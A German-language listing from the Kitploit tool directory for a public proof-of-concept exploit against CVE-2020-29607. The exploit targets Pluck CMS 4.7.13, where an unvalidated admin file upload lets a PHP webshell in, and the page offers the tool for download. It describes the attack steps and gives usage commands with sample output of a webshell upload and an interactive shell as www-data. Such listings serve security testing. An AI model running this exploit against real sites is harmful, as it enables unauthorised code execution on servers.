Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-29607-Pluck-CMS-4.7.13-Authenticated-File-Upload-RCE-PoC — Authentifizierter RCE-Exploit für Pluck CMS <= 4.7.13 über nicht validierten Datei-Upload. Lädt eine PHP-Webshell hoch und bietet eine interaktive Befehlsshell. | Kitploit
Tools/GitHubGitHub/estebanzarate/cve-2020-29607-pluck-cms-4.7.13-authenticated-file-upload-rce-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsPayload-Entwicklung
GitHubestebanzarate/cve-2020-29607-pluck-cms-4.7.13-authenticated-file-upload-rce-poc

CVE-2020-29607-Pluck-CMS-4.7.13-Authenticated-File-Upload-RCE-PoC

Authentifizierter RCE-Exploit für Pluck CMS <= 4.7.13 über nicht validierten Datei-Upload. Lädt eine PHP-Webshell hoch und bietet eine interaktive Befehlsshell.

Repository anzeigen
1vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-29607 — Pluck CMS <= 4.7.13 Authentifizierter Datei-Upload-RCE (PoC)

Authentifizierte Remote-Codeausführung in Pluck CMS vor 4.7.13. Der Admin-Dateimanager (admin.php?action=files) validiert Dateiendungen nicht, wodurch das Hochladen von .phar-Dateien ermöglicht wird, die Apache als PHP ausführt. Das Hochladen einer Webshell über diesen Endpunkt führt zu RCE als Webserver-Benutzer.


So funktioniert es

  1. Authentifiziert sich mit dem bereitgestellten Admin-Passwort.
  2. Lädt eine PHP-Webshell als shell.phar über den Admin-Dateimanager hoch.
  3. Überprüft die Ausführung, indem die Shell angefordert und id ausgeführt wird.
  4. Öffnet eine interaktive Befehlsschleife gegen die hochgeladene Webshell.

Voraussetzungen

  • Python 3
  • Abhängigkeiten installieren:
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit

Verwendung

root@kitploit:~
# Pluck at root
python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD

# Pluck in a subdirectory
python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD --path /pluck

Beispiel:

root@kitploit:~
$ python3 exploit.py -u http://10.10.10.10 -p admin123
[*] Logging in...
[+] Logged in
[*] Uploading webshell...
[+] Webshell uploaded
[*] Shell URL: http://10.10.10.10/files/shell.phar
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.

Shell> whoami
www-data

Referenzen

  • CVE-2020-29607
  • EDB-49909
  • Original-PoC von Ron Jost (Hacker5preme)

Danksagungen

  • Entdeckung & Original-Exploit: Ron Jost (Hacker5preme)
  • Python-3-Port & interaktive Shell: Esteban Zárate
Tool herunterladen